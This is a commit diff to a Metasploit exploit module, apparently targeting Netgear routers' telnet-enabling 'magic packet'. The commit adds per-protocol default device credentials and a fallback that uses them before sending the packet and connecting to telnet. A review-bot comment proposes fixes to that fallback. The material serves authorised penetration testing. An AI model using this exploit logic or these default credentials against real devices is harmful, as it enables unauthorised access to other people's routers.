Use default creds specific to protocol

GSoC/Meterpreter_Web_Console
William Vu 2018-03-02 06:20:21 -06:00
parent 1f40afea9c
commit fba30d47a2
1 changed files with 26 additions and 11 deletions


@ -39,9 +39,19 @@ class MetasploitModule < Msf::Exploit::Remote
}
},
'Targets' => [
['Automatic (detect TCP or UDP)', proto: :auto],
['TCP (typically older devices)', proto: :tcp],
['UDP (typically newer devices)', proto: :udp]
['Automatic (detect TCP or UDP)',
proto: :auto
],
['TCP (typically older devices)',
proto: :tcp,
username: 'Gearguy',
password: 'Geardog'
],
['UDP (typically newer devices)',
proto: :udp,
username: 'admin',
password: 'password'
]
],
'DefaultTarget' => 0
))
@ -49,13 +59,15 @@ class MetasploitModule < Msf::Exploit::Remote
register_options([
Opt::RPORT(23),
OptString.new('MAC', [true, 'MAC address of device']),
OptString.new('USERNAME', [true, 'Username on device', 'Gearguy']),
OptString.new('PASSWORD', [true, 'Password on device', 'Geardog'])
OptString.new('USERNAME', [false, 'Username on device']),
OptString.new('PASSWORD', [false, 'Password on device'])
])
end
def exploit
@proto = target[:proto]
@username = datastore['USERNAME'] || target[:username]
@password = datastore['PASSWORD'] || target[:password]
# Detect TCP or UDP
if @proto == :auto
@ -71,6 +83,13 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
# Try to use default creds
unless @username && @password
tgt = targets.find { |t| t[:proto] == @proto }
@username = tgt[:username]
@password = tgt[:password]
end
# Shell it
exploit_telnetenabled
connect_telnetd
@ -79,11 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit_telnetenabled
# Generate the magic packet
print_status('Generating magic packet')
payload = magic_packet(
datastore['MAC'],
datastore['USERNAME'],
datastore['PASSWORD']
)
payload = magic_packet(datastore['MAC'], @username, @password)
# Send the magic packet via TCP or UDP
begin
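Review bot: In the `unless @username && @password` fallback (third hunk, inside `exploit`, whose body runs beyond the visible hunks), a value set for only one of USERNAME or PASSWORD is silently discarded, because the block reassigns both instance variables whenever either is nil. Filling each one independently keeps an explicit setting: `tgt = targets.find { |t| t[:proto] == @proto }`, then `@username ||= tgt[:username]` and `@password ||= tgt[:password]`. The Automatic target carries no credentials, so if detection can leave `@proto` at `:auto` (the detection code is not shown) `magic_packet` would receive nil for both; a guard that stops with a clear message when either value is still nil would make that failure visible. The USERNAME and PASSWORD descriptions could also state that a blank value falls back to the selected target's defaults, since the options are no longer required.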